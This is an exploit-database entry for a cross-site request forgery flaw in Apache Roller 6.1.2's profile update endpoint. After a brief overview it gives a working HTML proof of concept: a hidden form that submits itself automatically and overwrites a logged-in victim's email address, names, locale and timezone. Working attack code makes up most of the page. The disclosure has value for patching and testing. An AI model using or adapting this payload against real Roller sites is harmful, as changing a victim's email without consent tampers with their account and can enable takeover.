Share
## https://sploitus.com/exploit?id=PACKETSTORM:214706
# Exploit Title: Apache Roller v6.1.2 - Cross-Site Request Forgery (CSRF) in Profile Update
    # Version: v6.1.2
    # Date: 2025-11-09
    # Exploit Author: Van Lam Nguyen
    # Facebook: https://www.facebook.com/vanlam1412
    # Vendor Homepage: https://roller.apache.org
    # Software Link: https://github.com/apache/roller/archive/refs/tags/roller-6.1.2.zip
    # Tested on: Windows
    # CVE: N/A
    # POC: https://github.com/vanlam2001/roller-csrf
    
    Overview
    ==================================================
    Roller v6.1.2 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /roller/roller-ui/profile!save.rol. 
    This vulnerability allows attackers to arbitrarily update the victim user's profile information (e.g., email, full name, locale, timezone) via a crafted HTML page
    
    Proof of Concept
    ==================================================
    Made an unauthorized request to /roller/roller-ui/profile!save.rol that updates the user's profile without CSRF protection
    <html>
    </head>
        <form id="exploitForm" action="http://localhost:8080/roller/roller-ui/profile!save.rol" method="POST">
            <input name="bean.userName" value="vanlam" type="hidden">
            <input name="bean.screenName" value="hacked" type="hidden">
            <input name="bean.fullName" value="hacked" type="hidden">
            <input name="bean.emailAddress" value="hacked@gmail.com" type="hidden">
            <input name="bean.passwordText" value="" type="hidden">
            <input name="bean.passwordConfirm" value="" type="hidden">
            <input name="bean.locale" value="vi_VN" type="hidden">
            <input name="bean.timeZone" value="Asia/Bangkok" type="hidden">
        </form>
    
        <script>
            document.getElementById('exploitForm').submit();
        </script>
    </body>
    </html>
    
    bean.userName: vanlam
    bean.screenName: hacked
    bean.fullName: hacked
    bean.emailAddress: hacked@gmail.com
    bean.passwordText: 
    bean.passwordConfirm: 
    bean.locale: vi_VN
    bean.timeZone: Asia/Bangkok